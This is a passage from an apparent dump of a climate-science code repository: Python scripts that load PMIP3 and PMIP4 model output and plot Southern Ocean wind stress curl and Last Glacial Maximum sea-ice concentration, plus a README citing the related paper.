ax[1].plot(PMIP4_sie[i],PMIP4[i].where(curl.LAT==PMIP4_sie[i],drop=True),marker='o',color=PMIP4_colors[i],markeredgecolor='k')\n\nax[1].legend(handles=[MIROC4_leg,IPSL4_leg,MPI4_leg,AWI_leg,LOVE_leg,CESM_leg,CCSM4UoT_leg])\n\nfor i in range(len(LOVE)):\n ax[2].plot(PMIP3_bad.LAT,LOVE[i],color=LOVE_colors[i],ls = LOVE_linestyle[i])\n ax[2].plot(LOVE_sie[i],LOVE[i].where(curl.LAT==LOVE_sie[i],drop=True),marker='o',color=LOVE_colors[i],markeredgecolor='k')\n\nax[2].legend(handles=[weakNA_leg,weakNA_AB_leg])\n\n# for i in range(3):\n# ax[i].text(-76.5,0.5,'Antarctic coast',rotation='vertical',fontsize=10,fontweight='bold')\n\nax[1].text(-76.5,0.5,'Antarctic coast',rotation='vertical',fontsize=10,fontweight='bold')\n\nax[0].text(-79,2.2,'a)',fontsize=10,fontweight='bold')\nax[1].text(-79,2.2,'b)',fontsize=10,fontweight='bold')\nax[2].text(-79,2.2,'c)',fontsize=10,fontweight='bold')\nax[0].set_title('PMIP3 models',fontsize=15,fontweight='bold')\nax[1].set_title('PMIP4 models',fontsize=15,fontweight='bold')\nax[2].set_title('LOVECLIM sensitivity runs',fontsize=15,fontweight='bold')\n\nplt.tight_layout(pad=2.2)\n\n# add labels\nfig.add_subplot(111, frameon=False)\n# hide tick and tick label of the big axes\nplt.tick_params(labelcolor='none', top=False, bottom=False, left=False, right=False)\nplt.grid(False)\nplt.ylabel(\"Wind Stress Curl (m/s)\",fontsize=15,fontweight='bold')\nplt.xlabel(\"Latitude (˚ S)\",fontsize=15,fontweight='bold')\n\nplt.show()\n#plt.savefig('Figures/Figure5_9.27.21.pdf')\n"
},
{
"alpha_fraction": 0.6377714276313782,
"alphanum_fraction": 0.7053222060203552,
"avg_line_length": 56.0355339050293,
"blob_id": "3da2c154ef46fdd46c691a974d1c2049789b0bbf",
"content_id": "c425582b245411820413a3bbf6316b0645de2e21",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11237,
"license_type": "no_license",
"max_line_length": 202,
"num_lines": 197,
"path": "/Figure5_seperated.py",
"repo_name": "RyanAGreen/PMIP_seaice",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport xarray as xr\nimport matplotlib.pyplot as plt\nimport matplotlib.path as mpath\nimport matplotlib.lines as mlines\nimport matplotlib.patches as mpatches\nimport matplotlib as mpl\n\ncurl = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/windstresscurlPMIP4.nc')\nPMIP3_bad = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/windstresscurlbadLOVE1.nc')\nPMIP3_good = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/windstresscurlgoodLOVE1.nc')\n\ncurl['CESM'] = curl.CESM*0.1\n\nLOVE = [PMIP3_good.CURLNAW,PMIP3_good.CURLNAWSOW]\nPMIP3 = [PMIP3_bad.CURLCNRM,PMIP3_bad.CURLGISS,PMIP3_bad.CURLIPSL,PMIP3_good.CURLMIROC,PMIP3_good.CURLMPI,PMIP3_good.CURLMRI,PMIP3_good.CURLFGOALS,PMIP3_bad.CURLCCSM4]\nPMIP4 = [curl.MIROC,curl.IPSL,curl.MPI,curl.AWI,curl.LOVE,curl.CESM,curl.CCSM4]\n\nThermodynamically_PMIP4 = [PMIP4[0],PMIP4[1],PMIP4[5],PMIP4[6]]\nDynamically_PMIP4 = [PMIP4[2],PMIP4[3],PMIP4[4]]\n\nThermodynamically_PMIP3 = [PMIP3[0],PMIP3[1],PMIP3[2],PMIP3[3],PMIP3[7]]\nDynamically_PMIP3 = [PMIP3[4],PMIP3[5],PMIP3[6]]\n\n# these are exact but I rounded\n# PMIP3_sie = [-75.5,-65.5,-70,-66.5,-65,-62.5,-61.5,-55.5]\n# PMIP4_sie = [-75.5,-70,-65,-62,-59.5,-57.5,-53]\n# LOVE_sie = [-59.5,58.5]\n\n# rounded down\nPMIP3_sie = [-75.5,-65.5,-69.5,-66.5,-64.5,-62.5,-61.5,-55.5]\nPMIP4_sie = [-75.5,-69.5,-64.5,-61.5,-59.5,-57.5,-52.5]\nLOVE_sie = [-59.5,-58.5]\nThermodynamically_PMIP4_sie = [PMIP4_sie[0],PMIP4_sie[1],PMIP4_sie[5],PMIP4_sie[6]]\nDynamically_PMIP4_sie = [PMIP4_sie[2],PMIP4_sie[3],PMIP4_sie[4]]\n\nThermodynamically_PMIP3_sie = [PMIP3_sie[0],PMIP3_sie[1],PMIP3_sie[2],PMIP3_sie[3],PMIP3_sie[7]]\nDynamically_PMIP3_sie = [PMIP3_sie[4],PMIP3_sie[5],PMIP3_sie[6]]\n\n\n# rounded up\n# PMIP3_sie = [-75.5,-65.5,-70.5,-66.5,-65.5,-62.5,-61.5,-55.5]\n# PMIP4_sie = [-75.5,-71.5,-65.5,-62.5,-59.5,-57.5,-53.5]\n# LOVE_sie = [-59.5,-58.5]\n\nPMIP3_colors = ['#ff7f0e','#e377c2','#1f77b4','#bcbd22','#9467bd','#2ca02c','#17becf','black']\nPMIP3_colors.reverse()\n\nPMIP4_colors = ['#ff7f0e','#8c564b','#F7DC6F','#B8255F','#bcbd22','#2ca02c','#9467bd']\nPMIP4_colors.reverse()\nLOVE_colors = ['#F7DC6F','#F7DC6F']\nLOVE_linestyle = ['dotted','dashdot']\n\n\n\n# set up legends\n\nPMIP3names = ['CNRM','GISS-E2-R','IPSL-CM5A-LR','MIROC-ESM-P','MPI-ESM-P','MRI-CGCM3','FGOALS-G2','CCSM4']\nPMIP4names= ['MIROC-ES2L','IPSL-CM5A2','MPI-ESM1-2','AWI-ESM-1','LOVECLIM','CESM1.2','UoT-CCSM4']\nLOVEnames = ['weakNA','weakNA_AB']\nThermodynamically_PMIP4_names = [PMIP4names[0],PMIP4names[1],PMIP4names[5],PMIP4names[6]]\nDynamically_PMIP4_names = [PMIP4names[2],PMIP4names[3],PMIP4names[4]]\n\nThermodynamically_PMIP3_names= [PMIP3names[0],PMIP3names[1],PMIP3names[2],PMIP3names[3],PMIP3names[7]]\nDynamically_PMIP3_names = [PMIP3names[4],PMIP3names[5],PMIP3names[6]]\n\n\n# colors are set from most sea ice to least\nPMIP3_colors = ['#ff7f0e','#e377c2','#1f77b4','#bcbd22','#9467bd','#2ca02c','#17becf','black']\nPMIP3_colors.reverse()\nPMIP4_colors = ['#ff7f0e','#8c564b','#F7DC6F','#B8255F','#bcbd22','#2ca02c','#9467bd']\nPMIP4_colors.reverse()\nLOVE_colors = ['#F7DC6F','#F7DC6F']\n\nThermodynamically_PMIP4_colors = [PMIP4_colors[0],PMIP4_colors[1],PMIP4_colors[5],PMIP4_colors[6]]\nDynamically_PMIP4_colors = [PMIP4_colors[2],PMIP4_colors[3],PMIP4_colors[4]]\n\nThermodynamically_PMIP3_colors= [PMIP3_colors[0],PMIP3_colors[1],PMIP3_colors[2],PMIP3_colors[3],PMIP3_colors[7]]\nDynamically_PMIP3_colors = [PMIP3_colors[4],PMIP3_colors[5],PMIP3_colors[6]]\n\n\n#PMIP3\nCNRM_leg = mlines.Line2D([], [], color=PMIP3_colors[0], 
linestyle ='solid',label = PMIP3names[0])\nGISS3_leg = mlines.Line2D([], [], color=PMIP3_colors[1], linestyle ='solid',label = PMIP3names[1])\nIPSL3_leg = mlines.Line2D([], [], color=PMIP3_colors[2], linestyle ='solid',label = PMIP3names[2])\nMIROC3_leg = mlines.Line2D([], [], color=PMIP3_colors[3], linestyle ='solid',label = PMIP3names[3])\nMPI3_leg = mlines.Line2D([], [], color=PMIP3_colors[4], linestyle ='solid',label = PMIP3names[4])\nMRI_leg = mlines.Line2D([], [], color=PMIP3_colors[5], linestyle ='solid',label = PMIP3names[5])\nFGOALS_leg = mlines.Line2D([], [], color=PMIP3_colors[6], linestyle ='solid',label = PMIP3names[6])\nCCSM4_leg = mlines.Line2D([], [], color=PMIP3_colors[7], linestyle ='solid',label = PMIP3names[7])\n\n#PMIP4\nMIROC4_leg = mlines.Line2D([], [], color=PMIP4_colors[0], linestyle ='solid',label = PMIP4names[0])\nIPSL4_leg = mlines.Line2D([], [], color=PMIP4_colors[1], linestyle ='solid',label = PMIP4names[1])\nMPI4_leg = mlines.Line2D([], [], color=PMIP4_colors[2], linestyle ='solid',label = PMIP4names[2])\nAWI_leg = mlines.Line2D([], [], color=PMIP4_colors[3], linestyle ='solid',label = PMIP4names[3])\nLOVE_leg = mlines.Line2D([], [], color=PMIP4_colors[4], linestyle ='solid',label = PMIP4names[4])\nCESM_leg = mlines.Line2D([], [], color=PMIP4_colors[5], linestyle ='solid',label = PMIP4names[5])\nCCSM4UoT_leg = mlines.Line2D([], [], color=PMIP4_colors[6], linestyle ='solid',label = PMIP4names[6])\n\n#LOVE\nweakNA_leg = mlines.Line2D([], [], color=LOVE_colors[0], linestyle ='dotted',label = LOVEnames[0])\nweakNA_AB_leg = mlines.Line2D([], [], color=LOVE_colors[1], linestyle ='dashdot',label = LOVEnames[1])\n\n# straight from Figure 2\n# legend will be least to greatest sea ice for all models\nCNRM_legend = mpatches.Patch(color='black', label='CNRM')\nMIROC_legend = mpatches.Patch(color='#9467bd', label='MIROC-ESM-P/MIROC-ES2L')\nGISS_legend = mpatches.Patch(color='#17becf', label='GISS-E2-R')\nIPSL_legend = mpatches.Patch(color='#2ca02c', label='IPSL-CM5A-LR/IPSL-CM5A2')\nMPI_legend = mpatches.Patch(color='#bcbd22', label='MPI-ESM-P/MPI-ESM1-2')\nMRI_legend = mpatches.Patch(color='#1f77b4', label='MRI-CGCM3')\nFGOALS_legend = mpatches.Patch(color='#e377c2', label='FGOALS-G2')\nAWI_legend = mpatches.Patch(color='#B8255F', label='AWI-ESM-1')\nLOVE_legend = mpatches.Patch(color='#F7DC6F', label='LOVECLIM')\nCESM_legend = mpatches.Patch(color='#8c564b', label='CESM1.2')\nCCSM4_legend = mpatches.Patch(color='#ff7f0e', label='CCSM4/UoTCCSM4')\n#MMM_legend = mpatches.Patch(color='black', label='Multi-model means')\nproxy_legend = mpatches.Patch(color='grey', label='Proxy data')\nPMIP4legend = mlines.Line2D([], [], color='black', linestyle ='solid',label = 'PMIP4 models')\nPMIP3legend = mlines.Line2D([], [], color='black', linestyle ='dashed',label = 'PMIP3 models')\n\nPMIP3_legend = mlines.Line2D([], [], color='black', marker='^', linestyle='None',markersize=8,markerfacecolor='white', label='PMIP3 models')\nPMIP4_legend = mlines.Line2D([], [], color='black', marker='s', linestyle='None',markersize=8,markerfacecolor='white', label='PMIP4 models')\nweakNA_legend = mlines.Line2D([], [], color='black', marker='P', linestyle='None',markersize=8,markerfacecolor='white', label='LOVECLIM-weakNA')\nweakNA_AB_legend = mlines.Line2D([], [], color='black', marker='X', linestyle='None',markersize=8,markerfacecolor='white', label='LOVECLIM-WeakNA_AB')\nProxy_legend = mlines.Line2D([], [], color='black', marker='o', linestyle='None',markersize=8,markerfacecolor='white', 
label='Estimate from \\nproxy SST')\n#MMM = mlines.Line2D([], [], color='black', marker='o', linestyle='None',markersize=8, label='Multi-model mean')\ndensly = (0, (3, 1, 1, 1))\nLOVE1_legend = mlines.Line2D([], [], color='#F7DC6F', linestyle ='dotted',label = 'LOVECLIM-weakNA')\nLOVE2_legend = mlines.Line2D([], [], color='#F7DC6F', linestyle ='dashdot',label = 'LOVECLIM-weakNA_AB')\nPMIP3_line = mlines.Line2D([], [], color='black', linestyle ='solid',label = 'PMIP3 model')\nPMIP4_line = mlines.Line2D([], [], color='black', linestyle =densly,label = 'PMIP4 model')\n\nfig,ax = plt.subplots(2,figsize=(10,10),sharex=True)\nplt.rcParams['font.sans-serif'] = 'Arial'\nplt.rcParams[\"font.weight\"] = \"bold\"\nymin = -2.5\nymax = 2.5\nfor i in range(2):\n ax[i].set_xlim(-80,-30)\n ax[i].set_ylim(ymin,ymax)\n ax[i].vlines(-75.5,ymin=ymin,ymax=ymax,colors='k',linestyles='dashdot',label='Antarctic Coast')\n ax[i].grid(ls=':')\n ax[i].tick_params(axis=\"both\", direction=\"out\", length=5, width=3, color=\"black\")\n for axis in ['top','bottom','left','right']:\n ax[i].spines[axis].set_linewidth(3)\n\nfor i in range(len(Thermodynamically_PMIP3)):\n ax[0].plot(PMIP3_bad.LAT,Thermodynamically_PMIP3[i],color=Thermodynamically_PMIP3_colors[i],ls = '--')\n ax[0].plot(Thermodynamically_PMIP3_sie[i],Thermodynamically_PMIP3[i].where(curl.LAT==Thermodynamically_PMIP3_sie[i],drop=True),marker='o',color=Thermodynamically_PMIP3_colors[i],markeredgecolor='k')\nfor i in range(len(Thermodynamically_PMIP4)):\n ax[0].plot(PMIP3_bad.LAT,Thermodynamically_PMIP4[i],color=Thermodynamically_PMIP4_colors[i])\n ax[0].plot(Thermodynamically_PMIP4_sie[i],Thermodynamically_PMIP4[i].where(curl.LAT==Thermodynamically_PMIP4_sie[i],drop=True),marker='o',color=Thermodynamically_PMIP4_colors[i],markeredgecolor='k')\n\n#ax[0].legend(handles=[CNRM_leg,GISS3_leg,IPSL3_leg,MIROC3_leg,MPI3_leg,MRI_leg,FGOALS_leg,CCSM4_leg])\n\nfor i in range(len(Dynamically_PMIP3)):\n ax[1].plot(PMIP3_bad.LAT,Dynamically_PMIP3[i],color=Dynamically_PMIP3_colors[i],ls = '--')\n ax[1].plot(Dynamically_PMIP3_sie[i],Dynamically_PMIP3[i].where(curl.LAT==Dynamically_PMIP3_sie[i],drop=True),marker='o',color=Dynamically_PMIP3_colors[i],markeredgecolor='k')\nfor i in range(len(Dynamically_PMIP4)):\n ax[1].plot(PMIP3_bad.LAT,Dynamically_PMIP4[i],color=Dynamically_PMIP4_colors[i])\n ax[1].plot(Dynamically_PMIP4_sie[i],Dynamically_PMIP4[i].where(curl.LAT==Dynamically_PMIP4_sie[i],drop=True),marker='o',color=Dynamically_PMIP4_colors[i],markeredgecolor='k')\n#ax[1].legend(handles=[MIROC4_leg,IPSL4_leg,MPI4_leg,AWI_leg,LOVE_leg,CESM_leg,CCSM4UoT_leg])\n\nfor i in range(len(LOVE)):\n ax[1].plot(PMIP3_bad.LAT,LOVE[i],color=LOVE_colors[i],ls = LOVE_linestyle[i])\n ax[1].plot(LOVE_sie[i],LOVE[i].where(curl.LAT==LOVE_sie[i],drop=True),marker='o',color=LOVE_colors[i],markeredgecolor='k')\n\n# ax[2].legend(handles=[weakNA_leg,weakNA_AB_leg])\n\n# for i in range(3):\n# ax[i].text(-76.5,0.5,'Antarctic coast',rotation='vertical',fontsize=10,fontweight='bold')\n\nax[1].text(-76.5,0.5,'Antarctic coast',rotation='vertical',fontsize=10,fontweight='bold')\nax[0].text(-76.5,0.5,'Antarctic coast',rotation='vertical',fontsize=10,fontweight='bold')\nax[0].text(-79,2.2,'a)',fontsize=10,fontweight='bold')\nax[1].text(-79,2.2,'b)',fontsize=10,fontweight='bold')\n#ax[2].text(-79,2.2,'c)',fontsize=10,fontweight='bold')\nax[0].set_title('Thermodynamically driven 
models',fontsize=15,fontweight='bold')\nax[0].legend(handles=[PMIP4legend,PMIP3legend,CNRM_legend,MIROC_legend,GISS_legend,IPSL_legend,CESM_legend,CCSM4_legend],ncol=3)\n\nax[1].set_title('Dynamically driven models',fontsize=15,fontweight='bold')\n#ax[2].set_title('LOVECLIM sensitivity runs',fontsize=15,fontweight='bold')\nax[1].legend(handles=[PMIP4legend,PMIP3legend,MPI_legend,MRI_legend,FGOALS_legend,AWI_legend,LOVE_legend,LOVE1_legend,LOVE2_legend],ncol=3)\nplt.tight_layout(pad=2.2)\n\n# add labels\nfig.add_subplot(111, frameon=False)\n# hide tick and tick label of the big axes\nplt.tick_params(labelcolor='none', top=False, bottom=False, left=False, right=False)\nplt.grid(False)\nplt.ylabel(\"Wind Stress Curl (m/s)\",fontsize=15,fontweight='bold')\nplt.xlabel(\"Latitude (˚ S)\",fontsize=15,fontweight='bold')\n\nplt.show()\n#plt.savefig('Figures/Figure5_separate.pdf')\n"
},
{
"alpha_fraction": 0.76408451795578,
"alphanum_fraction": 0.7957746386528015,
"avg_line_length": 283,
"blob_id": "d20d419a439dde70c6e055c84572a2e34c487088",
"content_id": "0f6960d51b087a1e1abf74cc6c9c68ce96ba27ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 284,
"license_type": "no_license",
"max_line_length": 283,
"num_lines": 1,
"path": "/README.md",
"repo_name": "RyanAGreen/PMIP_seaice",
"src_encoding": "UTF-8",
"text": "This repository contains the plotting code for our manuscript titled \"Evaluating seasonal sea-ice cover over the Southern Ocean at the Last Glacial Maximum\", published in *Climate of the Past*. The full manuscript can be found [here](https://cp.copernicus.org/articles/18/845/2022/).\n"
},
{
"alpha_fraction": 0.6572666764259338,
"alphanum_fraction": 0.716124415397644,
"avg_line_length": 43.814491271972656,
"blob_id": "1cc3b9d639eba09305e3c02f0b3a27d9823cad78",
"content_id": "27e5b650c3e27dc603fa4989e6902cdff8eaa29f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15461,
"license_type": "no_license",
"max_line_length": 162,
"num_lines": 345,
"path": "/ConvertNetCDF.py",
"repo_name": "RyanAGreen/PMIP_seaice",
"src_encoding": "UTF-8",
"text": "# two columns PMIP\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nimport xarray as xr\nimport cartopy.crs as ccrs\nimport cartopy\nimport cartopy.feature as cfeature\nimport matplotlib.ticker as mticker\nfrom cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\nimport matplotlib.path as mpath\nimport matplotlib.lines as mlines\n\n# load in PMIP3 data\nCNRM_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/sic_OIclim_CNRM-CM5_lgm_r1i1p1_180001-199912-climregrid.nc',decode_times=False)\nFGOALS_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/sic_OIclim_FGOALS-g2_lgm_r1i1p1_055001-064912-climregrid.nc',decode_times=False)\nIPSL_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/sic_OIclim_IPSL-CM5A-LR_lgm_r1i1p1_260101-280012-climregrid.nc',decode_times=False)\nMIROC_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/sic_OIclim_MIROC-ESM_lgm_r1i1p1_460001-469912-climregrid.nc',decode_times=False)\nMRI_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/sic_OIclim_MRI-CGCM3_lgm_r1i1p1_250101-260012-climregrid.nc',decode_times=False)\n\nLOVE1_sum_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/LOVE1_albq_summer.nc',decode_times=False) # check if this is loveclim1 or 2\nfeb = LOVE1_sum_3.FEB.mean(dim='AX005')\nmar = LOVE1_sum_3.MAR.mean(dim='AX006')\nLOVE1_sum_3 = (mar + feb)/2\n\nLOVE1_win_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/V3LNAwSeaIceConcWinter.nc',decode_times=False) # check if this is loveclim1 or 2\njul = LOVE1_win_3.ALJUL.mean(dim='AX007')\naug2 = LOVE1_win_3.ALAUG.mean(dim='AX008')\nLOVE1_win_3 = (jul + aug2)/2\n\n#### Summer\n\n# data sets with preset variables\nCCSM4_sum_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMinimum-sic-CCSM4_lgm.nc',decode_times=False)\nCCSM4_sum_3 = (CCSM4_sum_3.S1A + CCSM4_sum_3.S1B)/2\nGISS_sum_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMinimum-sic-GISS_lgm.nc',decode_times=False)\nGISS_sum_3 = (GISS_sum_3.S2A + GISS_sum_3.S2B)/2\nMPI_sum_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMinimum-sic-MPI_lgm.nc',decode_times=False)\nMPI_sum_3 = (MPI_sum_3.S3A + MPI_sum_3.S3B)/2\n\n\n# original data file that has 12 time points\nCNRM_3_sum = xr.concat([CNRM_3.sel(time=(CNRM_3.time[1])), CNRM_3.sel(time=(CNRM_3.time[2]))], dim=\"time\")\nCNRM_3_sum = CNRM_3_sum.mean(dim='time') # or whatever the time axis is called for this variable (different for loveclim)\nFGOALS_3_sum = xr.concat([FGOALS_3.sel(time=(FGOALS_3.time[2])), FGOALS_3.sel(time=(FGOALS_3.time[3]))], dim=\"time\")\nFGOALS_3_sum = FGOALS_3_sum.mean(dim='time')\nIPSL_3_sum = xr.concat([IPSL_3.sel(time=(IPSL_3.time[1])), IPSL_3.sel(time=(IPSL_3.time[2]))], dim=\"time\")\nIPSL_3_sum = IPSL_3_sum.mean(dim='time')\nMIROC_3_sum = xr.concat([MIROC_3.sel(time=(MIROC_3.time[1])), MIROC_3.sel(time=(MIROC_3.time[2]))], dim=\"time\")\nMIROC_3_sum = MIROC_3_sum.mean(dim='time')\nMRI_3_sum = xr.concat([MRI_3.sel(time=(MRI_3.time[1])), MRI_3.sel(time=(MRI_3.time[2]))], dim=\"time\")\nMRI_3_sum = MRI_3_sum.mean(dim='time')\nLOVE2_sum_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/V3LNAwSOwSHWwSeaIceConcSUMMER.nc',decode_times=False) # check if this is loveclim1 or 2\naug = LOVE2_sum_3.ALFEB.mean(dim='AX005')\nsep = LOVE2_sum_3.ALMAR.mean(dim='AX006')\nLOVE2_sum_3 = (aug + sep)/2\n\n\n\n# Multi model mean\nMMM_sum = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/AnnualMinimum15%.nc',decode_times=False)\n\n#### Winter\n\n# data sets with preset variables\n# data sets with preset variables\nCCSM4_win_3 = 
xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMaximum-sic-CCSM4_lgm.nc',decode_times=False)\nCCSM4_win_3 = (CCSM4_win_3.S1A + CCSM4_win_3.S1B)/2\nGISS_win_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMaximum-sic-GISS_lgm.nc',decode_times=False)\nGISS_win_3 = (GISS_win_3.S2A + GISS_win_3.S2B)/2\nGISS_win_3 = GISS_win_3.isel(LAT=(GISS_win_3.LAT > -70))\nMPI_win_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMaximum-sic-MPI_lgm.nc',decode_times=False)\nMPI_win_3 = (MPI_win_3.S3A + MPI_win_3.S3B)/2\n\n\n# original data file that has 12 time points\nCNRM_3_win = xr.concat([CNRM_3.sel(time=(CNRM_3.time[8])), CNRM_3.sel(time=(CNRM_3.time[9]))], dim=\"time\")\nCNRM_3_win = CNRM_3_win.mean(dim='time') # or whatever the time axis is called for this variable (different for loveclim)\nFGOALS_3_win = xr.concat([FGOALS_3.sel(time=(FGOALS_3.time[8])), FGOALS_3.sel(time=(FGOALS_3.time[9]))], dim=\"time\")\nFGOALS_3_win = FGOALS_3_win.mean(dim='time')\nFGOALS_3_win = FGOALS_3_win.isel(lat=(FGOALS_3_win.lat > -70))\nIPSL_3_win = xr.concat([IPSL_3.sel(time=(IPSL_3.time[7])), IPSL_3.sel(time=(IPSL_3.time[8]))], dim=\"time\")\nIPSL_3_win = IPSL_3_win.mean(dim='time')\nMIROC_3_win = xr.concat([MIROC_3.sel(time=(MIROC_3.time[8])), MIROC_3.sel(time=(MIROC_3.time[9]))], dim=\"time\")\nMIROC_3_win = MIROC_3_win.mean(dim='time')\nMRI_3_win = xr.concat([MRI_3.sel(time=(MRI_3.time[8])), MRI_3.sel(time=(MRI_3.time[9]))], dim=\"time\")\nMRI_3_win = MRI_3_win.mean(dim='time')\nMRI_3_win = MRI_3_win.isel(lat=(MRI_3_win.lat > -70))\nLOVE2_win_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/V3LNAwSOwSHWwSeaIceConcWINTER.nc',decode_times=False) # check if this is loveclim1 or 2\naug = LOVE2_win_3.ALAUG.mean(dim='AX005')\nsep = LOVE2_win_3.ALSEP.mean(dim='AX006')\nLOVE2_win_3 = (aug + sep)/2\n\n\n# Multi model mean winter\nMMM_win = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/AnnualMaximum15%.nc',decode_times=False)\n\n# load in PMIP4 data\n\niLOVECLIM = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/cresum18250_regrid.nc',decode_times=False)\nLOVEsic = iLOVECLIM.albq\nfeb = LOVEsic[1:2400:12]\nmar = LOVEsic[2:2400:12]\naug = LOVEsic[7:2400:12]\nsep = LOVEsic[8:2400:12]\nmar = mar.mean(dim='time')\nfeb = feb.mean(dim='time')\nsep = sep.mean(dim='time')\naug = aug.mean(dim='time')\nLOVEsummer = (mar+feb)/2\nLOVEwinter = (sep + aug)/2\nLOVEsummer = LOVEsummer * 100\nLOVEwinter = LOVEwinter * 100\n\n\nAWI = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/AWI_PMIP4_siconca_regrid.nc',decode_times=False)\nMIROC = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/MIROC_PMIP4_siconc_regrid.nc',decode_times=False)\nMPI = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/MPIPMIP4_siconc_regrid.nc',decode_times=False)\nCESM12 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/b.e12.B1850C5.f19_g16.i21ka.03.pop.h.vars.08010900.climo_regrid.nc',decode_times=False)\nCCSM4UoT = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/siconc_SImon_UofT-CCSM4_lgm_r1i1p1f1_gn_110101-120012_regrid.nc',decode_times=False)\nIPSL = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/IPSLCM5A2_LGM_regrid.nc',decode_times=False)\n\n\n# datasets that need to be averaged over 2 month period\nAWI_winter = xr.concat([AWI.sel(time=(AWI.time[7::12])), AWI.sel(time=(AWI.time[8::12]))], dim=\"time\") # August September\nAWI_winter = AWI_winter.mean(dim='time')\nAWI_winter = AWI_winter.isel(lat=(AWI_winter.lat > -70))\nAWI_summer = xr.concat([AWI.sel(time=(AWI.time[1::12])), 
AWI.sel(time=(AWI.time[2::12]))], dim=\"time\") # Feb March\nAWI_summer = AWI_summer.mean(dim='time')\n\nMIROC_winter = xr.concat([MIROC.sel(time=(MIROC.time[8::12])), MIROC.sel(time=(MIROC.time[9::12]))], dim=\"time\") # Sep october\nMIROC_winter = MIROC_winter.mean(dim='time')\nMIROC_summer = xr.concat([MIROC.sel(time=(MIROC.time[1::12])), MIROC.sel(time=(MIROC.time[2::12]))], dim=\"time\") # Feb march\nMIROC_summer = MIROC_summer.mean(dim='time')\n\nMPI_winter = xr.concat([MPI.sel(time=(MPI.time[8::12])), MPI.sel(time=(MPI.time[9::12]))], dim=\"time\")\nMPI_winter = MPI_winter.mean(dim='time')\nMPI_summer = xr.concat([MPI.sel(time=(MPI.time[1::12])), MPI.sel(time=(MPI.time[2::12]))], dim=\"time\")\nMPI_summer = MPI_summer.mean(dim='time')\n\nCESM12_winter = xr.concat([CESM12.sel(time=(CESM12.time[7])), CESM12.sel(time=(CESM12.time[8]))], dim=\"time\")\nCESM12_winter = CESM12_winter.mean(dim='time')\nCESM12_summer = xr.concat([CESM12.sel(time=(CESM12.time[1])), CESM12.sel(time=(CESM12.time[2]))], dim=\"time\")\nCESM12_summer = CESM12_summer.mean(dim='time')\n\nCCSM4UoT_winter = xr.concat([CCSM4UoT.sel(time=(CCSM4UoT.time[8::12])), CCSM4UoT.sel(time=(CCSM4UoT.time[9::12]))], dim=\"time\")\nCCSM4UoT_winter = CCSM4UoT_winter.mean(dim='time')\nCCSM4UoT_summer = xr.concat([CCSM4UoT.sel(time=(CCSM4UoT.time[2::12])), CCSM4UoT.sel(time=(CCSM4UoT.time[3::12]))], dim=\"time\")\nCCSM4UoT_summer = CCSM4UoT_summer.mean(dim='time')\n\nIPSL_winter = xr.concat([IPSL.sel(time_counter=(IPSL.time_counter[7])), IPSL.sel(time_counter=(IPSL.time_counter[8]))], dim=\"time_counter\") # August September\nIPSL_winter = IPSL_winter.mean(dim='time_counter')\nIPSL_winter = IPSL_winter.isel(lat=(IPSL_winter.lat > -70))\nIPSL_summer = xr.concat([IPSL.sel(time_counter=(IPSL.time_counter[1])), IPSL.sel(time_counter=(IPSL.time_counter[2]))], dim=\"time_counter\") # Feb March\nIPSL_summer = IPSL_summer.mean(dim='time_counter')\n\n#####################\n\n#####PMIP3#####\n# austral summer MMM\nMMM_CCSM4 = (MMM_sum.CCSM4R2 + MMM_sum.CCSM4R1)/2\nMMM_GISS = (MMM_sum.GISSP150 + MMM_sum.GISSP151)/2\nMMM_MPI = (MMM_sum.MPIP1 + MMM_sum.MPIP2)/2\nMMM_sum['CCSM4'] = MMM_CCSM4\nMMM_sum['GISS'] = MMM_GISS\nMMM_sum['MPI'] = MMM_MPI\nMMM_sum = MMM_sum.drop_vars('CCSM4R1')\nMMM_sum = MMM_sum.drop_vars('CCSM4R2')\nMMM_sum = MMM_sum.drop_vars('GISSP150')\nMMM_sum = MMM_sum.drop_vars('GISSP151')\nMMM_sum = MMM_sum.drop_vars('MPIP1')\nMMM_sum = MMM_sum.drop_vars('MPIP2')\nMMM_LOVE1_sum_3 = LOVE1_sum_3*100\nMMM_LOVE2_sum_3 = LOVE2_sum_3*100\n\n# multi model mean\nMMM_sum_mean = (MMM_sum.CNRM + MMM_sum.FGOALS + MMM_sum.IPSL + MMM_sum.MIROC + MMM_sum.MRI + MMM_sum.CCSM4 + MMM_sum.MPI + MMM_sum.GISS)/8\n\n# calculating 